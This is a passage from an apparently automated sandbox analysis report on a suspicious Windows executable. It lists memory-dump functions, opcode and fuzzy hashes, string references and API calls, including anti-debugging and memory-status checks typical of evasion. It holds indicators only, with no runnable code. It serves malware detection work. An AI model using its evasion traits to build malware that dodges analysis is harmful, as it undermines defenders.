Instruction Fuzzy Hash: 8941E0B5D04258DFCB00CFA9D484AEEFBF0BB49310F14906AE455B7240C738AA85CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 05E60006 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1650702212.0000000005E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e60000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e874c9ef4b690a408c6aea613dfd522fd808de7f94f74445a12b50bc9b1d899b
Instruction ID: 6dc9069aa134eadaaad14f652c8d528a341ea738e7ac6c2b4a8540aee25d3d9e
Opcode Fuzzy Hash: e874c9ef4b690a408c6aea613dfd522fd808de7f94f74445a12b50bc9b1d899b
Instruction Fuzzy Hash: 3E315E70D053949FEB69CF6A8C08299BBF2AFC5200F05C0FAD458AA265DB740985DF11

Uniqueness

Uniqueness Score: -1.00%

Function 05E60040 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1650702212.0000000005E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e60000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 531e75d615dc3744026cc9b1becfd54ce69e3a2e2751b0eb3a440e64a97287b6
Instruction ID: 5e3c87fcef6049a8ab97464a9248a09587907379093071b651b5a48898629ca9
Opcode Fuzzy Hash: 531e75d615dc3744026cc9b1becfd54ce69e3a2e2751b0eb3a440e64a97287b6
Instruction Fuzzy Hash: 0F31DC70E05229DBDB68CF5AC948699FAF6BF88300F04D1FAD858A6254EB741A81DF41

Uniqueness

Uniqueness Score: -1.00%

Function 02F6E489 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1636454530.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f60000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da14886d2b1aa1bdb77fb84b18f3821e26a695f4a233187d88514455de58e9da
Instruction ID: 3b1eefe387f24e54c79b6ac79669bdda6d06c48a7072ec9a6dc2085d132f5b19
Opcode Fuzzy Hash: da14886d2b1aa1bdb77fb84b18f3821e26a695f4a233187d88514455de58e9da
Instruction Fuzzy Hash: BA218E76D046588BDB68CF5BDD442DDFBF3AFC9301F04C0BA9419AA654DB340A458F41

Uniqueness

Uniqueness Score: -1.00%

Function 05AD8790 Relevance: 7.9, Strings: 6, Instructions: 408COMMON

Download Yara Rule

Strings

4'^q, xrefs: 05AD8844
4'^q, xrefs: 05AD8862
4'^q, xrefs: 05AD88DA
pbq, xrefs: 05AD88E7
(bq, xrefs: 05AD895A
4'^q, xrefs: 05AD8814

Memory Dump Source

Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID: (bq$4'^q$4'^q$4'^q$4'^q$pbq
API String ID: 0-723292480
Opcode ID: fa996e5f33c0ca76103c702ae68ac8a804eb7974d250f9d5be78c0003ed38b8e
Instruction ID: 25e16390e72eee18ad6ce184d5cdd56d84365970c1e0cc12a1f26f2eba62dba0
Opcode Fuzzy Hash: fa996e5f33c0ca76103c702ae68ac8a804eb7974d250f9d5be78c0003ed38b8e
Instruction Fuzzy Hash: 68D14F32A00119DFCB09DF64C954DAABBB2FF88310F054498E50AAB275DB36ED56DF90

Uniqueness

Uniqueness Score: -1.00%

Function 05B40781 Relevance: 5.1, Strings: 4, Instructions: 52COMMON

Download Yara Rule

Strings

6, xrefs: 05B402FB
I, xrefs: 05B40B2E
;, xrefs: 05B40B02
5, xrefs: 05B402CF

Memory Dump Source

Source File: 00000000.00000002.1649183304.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b40000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID: 5$6$;$I
API String ID: 0-753759495
Opcode ID: 24a6057fbd0d3e5ae8dac2b525bdda98ffe8ca781a5489e513009f65311accac
Instruction ID: fc6478d0d2dc0028d7483cebc8dbb02c76f53ef4843e8d0cc19f741c0740e2e5
Opcode Fuzzy Hash: 24a6057fbd0d3e5ae8dac2b525bdda98ffe8ca781a5489e513009f65311accac
Instruction Fuzzy Hash: 1C21043090122DCFDB60EF64C998BAEBAB2FB48340F1011E9D609BB290C7346E84DF50

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: T_240369_S#U0130PAR#U0130S.exePID: 7340, Parent PID: 7304COMMON

Execution Graph

Execution Coverage:	11.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	1.9%
Total number of Nodes:	155
Total number of Limit Nodes:	19

Executed Functions

Function 06672B30 Relevance: 8.4, Strings: 6, Instructions: 938COMMON

Download Yara Rule

Strings

$^q, xrefs: 066737CB
$^q, xrefs: 066737B3
$^q, xrefs: 0667378A
$^q, xrefs: 0667377E
$^q, xrefs: 066737D7
$^q, xrefs: 066737A7

Memory Dump Source

Source File: 00000001.00000002.4093285216.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6670000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2392861976
Opcode ID: fdabb3cb0f970290d554990d10aeeb8e98c6a68f5543eaee9f8facf8cb5ade91
Instruction ID: 3b883e22657618e1fa1febf77a63ad7b1645c32c26e320ea696b3f124fba8b43
Opcode Fuzzy Hash: fdabb3cb0f970290d554990d10aeeb8e98c6a68f5543eaee9f8facf8cb5ade91
Instruction Fuzzy Hash: 6C822830E106198FCB64DF64C994A9DB7B2FF89304F54C6A9D449AB364EB31ED85CB80

Uniqueness

Uniqueness Score: -1.00%

Function 0667B280 Relevance: 8.3, Strings: 6, Instructions: 775COMMON

Download Yara Rule

Strings

$^q, xrefs: 0667BBF1
$^q, xrefs: 0667BC31
$^q, xrefs: 0667BC25
$^q, xrefs: 0667BC59
$^q, xrefs: 0667BC65
$^q, xrefs: 0667BBFD

Memory Dump Source

Source File: 00000001.00000002.4093285216.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6670000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2392861976
Opcode ID: 864b43314d149f575a0deb1f3c94708452aa03ef68e0399462c14ec9170df858
Instruction ID: dbcff989051ef36712ed5fb45fd9479cb646d30671ac239de45cf0a0c7cacaf4
Opcode Fuzzy Hash: 864b43314d149f575a0deb1f3c94708452aa03ef68e0399462c14ec9170df858
Instruction Fuzzy Hash: E9529030E102098FDF64DFA8D594BAEB7B2FB85310F20892AE415EB355DA35DC85CB91

Uniqueness

Uniqueness Score: -1.00%

Function 06677DC8 Relevance: 3.0, Strings: 2, Instructions: 478
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 06678105
$^q, xrefs: 06678111

Memory Dump Source

Source File: 00000001.00000002.4093285216.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6670000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: 43d9dde4bfa8d3c9de4cd75a15d53cbf7ef0661ba5c2537abd817a0a2a799140
Instruction ID: b3c0bf0038fa28021f513f0e1b1d876775419b1928b2e306c2c4df0917540384
Opcode Fuzzy Hash: 43d9dde4bfa8d3c9de4cd75a15d53cbf7ef0661ba5c2537abd817a0a2a799140
Instruction Fuzzy Hash: 97029F30B1020A9FDB54DBA8D994AAEB7E2FF84314F148539E405DB395DB35EC86CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0667C1D8 Relevance: 1.9, Strings: 1, Instructions: 646COMMON

Download Yara Rule

Strings

p, xrefs: 0667C81C

Memory Dump Source

Source File: 00000001.00000002.4093285216.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6670000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID: p
API String ID: 0-2181537457
Opcode ID: 6c93a30e7f3dc5207d26eb2fc66ae91de4ead43c86fe3d0d9b7a7fb8e881babc
Instruction ID: 9855703fd78c3af8ce41c9b2c75dad841030b3bf57bde00b7fc4df3c64773a7b
Opcode Fuzzy Hash: 6c93a30e7f3dc5207d26eb2fc66ae91de4ead43c86fe3d0d9b7a7fb8e881babc
Instruction Fuzzy Hash: 55326030F102099FDF54DB68D990BAEBBB2FB88314F108529E505EB795DB35EC428B91

Uniqueness

Uniqueness Score: -1.00%

Function 066755E8 Relevance: 1.8, Strings: 1, Instructions: 594
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$, xrefs: 0667592B

Memory Dump Source

Source File: 00000001.00000002.4093285216.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6670000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-3993045852
Opcode ID: b5b663a81591e5b960d73a1c28f37a6a54901eb4eb9770d87c2bc1a7eee64ef0
Instruction ID: 9701294252ba842a7cc3fb360f3b83ea77066d1ce88750ef37a073611512eefb
Opcode Fuzzy Hash: b5b663a81591e5b960d73a1c28f37a6a54901eb4eb9770d87c2bc1a7eee64ef0
Instruction Fuzzy Hash: 3E22E135E002199FDB64DBA4C4946AEBBB2FF85314F2484A9D44AAB344DE31DD42CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01147040 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 011470B7

Memory Dump Source

Source File: 00000001.00000002.4086615426.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1140000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
API String ID: 3662101638-0
Opcode ID: a4a94171b4808b85801c065f588f57912d0281526af35cef1ca5906f82f30652
Instruction ID: 5983a1361ca0afee20e5338944318d479cae70a08851ed5365b42730abf8e67e
Opcode Fuzzy Hash: a4a94171b4808b85801c065f588f57912d0281526af35cef1ca5906f82f30652
Instruction Fuzzy Hash: E22145B1801259CFCB14CF9AD484BEEFBF4AF49320F14842AE458A3251C738AA44CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 06676638 Relevance: .8, Instructions: 818COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4093285216.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6670000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5abe997df88be1010635999cb04eecdb656245c699ed2d1c006ddb509bad9f8
Instruction ID: 2f2d4e3add737bb65546f8916ff5a1f691f4edad8922014ca3c2870a9bb4a70f
Opcode Fuzzy Hash: d5abe997df88be1010635999cb04eecdb656245c699ed2d1c006ddb509bad9f8
Instruction Fuzzy Hash: 4962AE34F106058FDB54DB68D594AADBBF2EF88314F248469E40AEB394DB35EC46CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0667AD18 Relevance: 10.4, Strings: 8, Instructions: 393
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 0667AEE4
$^q, xrefs: 0667AEF0
$^q, xrefs: 0667AE98
$^q, xrefs: 0667AE39
$^q, xrefs: 0667AEBB
$^q, xrefs: 0667AE8C
$^q, xrefs: 0667AE45
$^q, xrefs: 0667AEC7

Memory Dump Source

Source File: 00000001.00000002.4093285216.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6670000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-3823777903
Opcode ID: 828ca2bc065baeecbdbff97a7812beb72e1c72ec034ce6d1ff84f5848e66be94
Instruction ID: 76f58784750d60d869aa23eca5116635f559014ad7c9bf9cf2495a3a283634e6
Opcode Fuzzy Hash: 828ca2bc065baeecbdbff97a7812beb72e1c72ec034ce6d1ff84f5848e66be94
Instruction Fuzzy Hash: 4FE16D30E1020A8FDB69DFA9D5906AEB7B2FF89304F108529E409EB355DB35DC46CB81

Uniqueness

Uniqueness Score: -1.00%

Function 06679198 Relevance: 5.2, Strings: 4, Instructions: 231
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 0667924F
$^q, xrefs: 06679214
$^q, xrefs: 06679208
$^q, xrefs: 06679243

Memory Dump Source

Source File: 00000001.00000002.4093285216.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6670000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: bfde40ca285d566bf15cbfa79d240d746a8261597ebb6b4c1909bdc6b6700e2f
Instruction ID: 1b4e002245d1575c28d793fee94c12c9c2e0eec75021c4a74bda7e31c57739ae
Opcode Fuzzy Hash: bfde40ca285d566bf15cbfa79d240d746a8261597ebb6b4c1909bdc6b6700e2f
Instruction Fuzzy Hash: F0914130B1021A9FDB64DB65D950BAFB7F6AFC9304F108569C409EB748EE30DC468B91

Uniqueness

Uniqueness Score: -1.00%

Function 0667CF90 Relevance: 4.6, Strings: 3, Instructions: 801
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 0667D39B
$^q, xrefs: 0667D38F
$^q, xrefs: 0667D387

Memory Dump Source

Source File: 00000001.00000002.4093285216.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6670000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q
API String ID: 0-831282457
Opcode ID: c55a38ec1fa2541e2c534967e3dafcf702520c13bd4bace2e3a8cb5a4f108cdf
Instruction ID: c2d544e7f058c2de3ccd451962542d7a1c353c59ccc7635d6f653bd1f09e9d25
Opcode Fuzzy Hash: c55a38ec1fa2541e2c534967e3dafcf702520c13bd4bace2e3a8cb5a4f108cdf
Instruction Fuzzy Hash: 3A627430A002069FCB55EF68D690A5EB7F2FF84304F648A29D0099F759DB75ED4ACB81

Uniqueness

Uniqueness Score: -1.00%

Function 06674BB0 Relevance: 3.9, Strings: 3, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

XPcq, xrefs: 06674CDD
fcq, xrefs: 066752BD
\Ocq, xrefs: 06674D67

Memory Dump Source

Source File: 00000001.00000002.4093285216.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6670000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID: fcq$XPcq$\Ocq
API String ID: 0-3575482020
Opcode ID: 672ec8c0c603016e5c1a415307f53a2c26c33ac032d2f8db12fbd700655e8558
Instruction ID: 9034490699e2f1353c2c96c48386f8fb5ed9cab08e436f4085d375895b8d7f6d
Opcode Fuzzy Hash: 672ec8c0c603016e5c1a415307f53a2c26c33ac032d2f8db12fbd700655e8558
Instruction Fuzzy Hash: 67615F30F102199FEB549FA8C8547AEBBF6FF88700F20852AE146AB394DE758C41CB55

Uniqueness

Uniqueness Score: -1.00%

Function 06679188 Relevance: 2.7, Strings: 2, Instructions: 174
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 06679208
$^q, xrefs: 06679243

Memory Dump Source

Source File: 00000001.00000002.4093285216.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6670000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: 1d23ba0d4204a0fcbb914e1c7fc13199ce35632c2cdc92856f5ece43349d20e7
Instruction ID: 3c3cc048081102f2321c763f46edf0c263f6e5b095aeec8980217636f2268448
Opcode Fuzzy Hash: 1d23ba0d4204a0fcbb914e1c7fc13199ce35632c2cdc92856f5ece43349d20e7
Instruction Fuzzy Hash: 06516F30B101059FDB54EB74D991B6FB3F6ABC9304F148569C409EB798EE31DC428B91

Uniqueness

Uniqueness Score: -1.00%

Function 0666CC28 Relevance: 1.7, APIs: 1, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4093220165.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6660000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: f30465579b8106d345473f9c7feb587f83306ca8a0f0e62d5293e395a4175a46
Instruction ID: 7a0e53a3887297ebe4b46999da190f1cec4a2060162a18aa8ce0da327f9f645f
Opcode Fuzzy Hash: f30465579b8106d345473f9c7feb587f83306ca8a0f0e62d5293e395a4175a46
Instruction Fuzzy Hash: 36713370A00B458FD7A4DF6AE45079ABBF1FF88204F008A2DE49AD7B50D735E845CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0666EDC5 Relevance: 1.6, APIs: 1, Instructions: 139COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0666EF22

Memory Dump Source

Source File: 00000001.00000002.4093220165.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6660000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: e4db9c82a66b3cf94d41a87e4158ac64c5ee9dc68e29afc021e0fe1515b69894
Instruction ID: 5a2ded42f522ad8f50d7931d45f040147c9162f11d0faa57ae1927577a38a081
Opcode Fuzzy Hash: e4db9c82a66b3cf94d41a87e4158ac64c5ee9dc68e29afc021e0fe1515b69894
Instruction Fuzzy Hash: E351E1B5C04249EFDF15CF9AD884ADEBFB5BF48304F14816AE818AB220D7719955CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0666EE04 Relevance: 1.6, APIs: 1, Instructions: 119COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0666EF22

Memory Dump Source

Source File: 00000001.00000002.4093220165.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6660000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 66a589778cd7de80a6d50b2fe633918629851cf4df034b08afd7525b64a95687
Instruction ID: 8577eacc9a4c15369a7c1eddd87e3d38146e14f0a4a714bc9f328de8ab72e928
Opcode Fuzzy Hash: 66a589778cd7de80a6d50b2fe633918629851cf4df034b08afd7525b64a95687
Instruction Fuzzy Hash: AB51D0B5D003489FDB14CF9AD884ADEFBB5BF48714F24852AE818AB210D7719845CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0666EE10 Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0666EF22

Memory Dump Source

Source File: 00000001.00000002.4093220165.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6660000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 81f46540072829dff7067c4f841eb5f88f6eb0730434666e54efa7e384e668cf
Instruction ID: d856a9cad96b9c66adad3104e71ab24f540042e9c9d9e5b9ee263f55755815af
Opcode Fuzzy Hash: 81f46540072829dff7067c4f841eb5f88f6eb0730434666e54efa7e384e668cf
Instruction Fuzzy Hash: FF41CFB5D00349DFDB14CF9AD884ADEBBB5BF88310F24852AE818AB210D7759945CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0114703A Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 011470B7

Memory Dump Source

Source File: 00000001.00000002.4086615426.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1140000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
API String ID: 3662101638-0
Opcode ID: 650e3596b77b6a7691fdfff4249201c6fcd5dc76df6c8530e77b6e13bf115e79
Instruction ID: a6166aa8fb626ee559b9c5dc7a3a5dcb786b057160eeb9193d89dbee97ec1bc3
Opcode Fuzzy Hash: 650e3596b77b6a7691fdfff4249201c6fcd5dc76df6c8530e77b6e13bf115e79
Instruction Fuzzy Hash: C62136B1C01259CFCB14CF99D444BEEBBF4AF49320F14842AE859A3251D3389A44CF65

Uniqueness

Uniqueness Score: -1.00%

Function 06664958 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 066649E7

Memory Dump Source

Source File: 00000001.00000002.4093220165.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6660000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 664b10accb97f00c4169df5395d927f339068b2ba079158dd90dd10f872974b0
Instruction ID: ade38538022747d51d363b3b64240261dec67c522992d3860e8c3b013582217c
Opcode Fuzzy Hash: 664b10accb97f00c4169df5395d927f339068b2ba079158dd90dd10f872974b0
Instruction Fuzzy Hash: BD21E3B5D00248DFDB10CFAAD984ADEBBF8FB48314F14811AE955A7310D774A940CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 06664960 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 066649E7

Memory Dump Source

Source File: 00000001.00000002.4093220165.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6660000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: c9aba759d634f58843b141b549157c4d6233839e492de955534ac1bd7e6e91f3
Instruction ID: 51072ed29397a06c6982953cceb2d4d04c2230e3c0c742377cc6bbcfc0d2d617
Opcode Fuzzy Hash: c9aba759d634f58843b141b549157c4d6233839e492de955534ac1bd7e6e91f3
Instruction Fuzzy Hash: 1121E3B5900248DFDB10CF9AD984ADEBBF4EB48314F14801AE954A3310C374A940CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0114F11F Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNELBASE ref: 0114F19F

Memory Dump Source

Source File: 00000001.00000002.4086615426.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1140000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: b66f8597a00f4b247158f36aee13960fd5b42c85fed4d67ad6940f46fa803b3e
Instruction ID: 7fe48a18c552514f1d5f8ab99229ca7a0a30aa3af15dda9fb20c2f240db48d7d
Opcode Fuzzy Hash: b66f8597a00f4b247158f36aee13960fd5b42c85fed4d67ad6940f46fa803b3e
Instruction Fuzzy Hash: 612142B6C0025A8FCB10CFA9C54479EFBB0AF08320F14816AD918B7251D338A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0666D07A Relevance: 1.6, APIs: 1, Instructions: 57libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,?,?), ref: 0666D0EA

Memory Dump Source

Source File: 00000001.00000002.4093220165.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6660000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: c5a0540aa424865448b6d0d5fe9d82e2c508758823f937217198153b09e48916
Instruction ID: 5a94f11528f10dad4ae115e25267bf60f50bf6557150c651b42c7be378eb1b77
Opcode Fuzzy Hash: c5a0540aa424865448b6d0d5fe9d82e2c508758823f937217198153b09e48916
Instruction Fuzzy Hash: A61123B6D002499FCB10CFAAD844ADEFBF8EF48710F10842AE419A7310C375A545CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 0114F138 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNELBASE ref: 0114F19F

Memory Dump Source

Source File: 00000001.00000002.4086615426.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1140000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 0f983f0f362e7a4ebb4f1b13b35d46825a76306532924e0290b93501cebe4de1
Instruction ID: d5620388613cfccb90919f96ebd740b8492e2b563c8d7742e7ef9afdd1b12eb8
Opcode Fuzzy Hash: 0f983f0f362e7a4ebb4f1b13b35d46825a76306532924e0290b93501cebe4de1
Instruction Fuzzy Hash: 451112B1C0025A9BCB10CF9AC544BDEFBF4AB48720F10812AD818B7250D378A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0666D080 Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,?,?), ref: 0666D0EA

Memory Dump Source

Source File: 00000001.00000002.4093220165.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6660000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 0f01ebd39ab3669aee64e5b120009942b630336ca384e50c100c344dbcf51c30
Instruction ID: 845761d6950c5122685107e69f9c6d3cd43bfe3d99710d89978d1437a8878117
Opcode Fuzzy Hash: 0f01ebd39ab3669aee64e5b120009942b630336ca384e50c100c344dbcf51c30
Instruction Fuzzy Hash: 2311F3B6D002498FDB10CF9AD844ADEFBF4EF48310F10842AE519A7210C375A545CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 0666BDF0 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,0666CC44), ref: 0666CE7E

Memory Dump Source

Source File: 00000001.00000002.4093220165.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6660000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: dcac8d17d890e3fdc595ef6dafb5e3b362325e6ab8df10eb547617a092a880ea
Instruction ID: 81982cb9f0f7c0d50c063213854a4f0b68565614703213d7c235d0810f075d4c
Opcode Fuzzy Hash: dcac8d17d890e3fdc595ef6dafb5e3b362325e6ab8df10eb547617a092a880ea
Instruction Fuzzy Hash: 691102B5D007898FCB10CF9AD444ADEFBF4EB48614F10842AE869B7210D379A545CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 06674B78 Relevance: 1.4, Strings: 1, Instructions: 146COMMON

Download Yara Rule

Strings

XPcq, xrefs: 06674CDD

Memory Dump Source

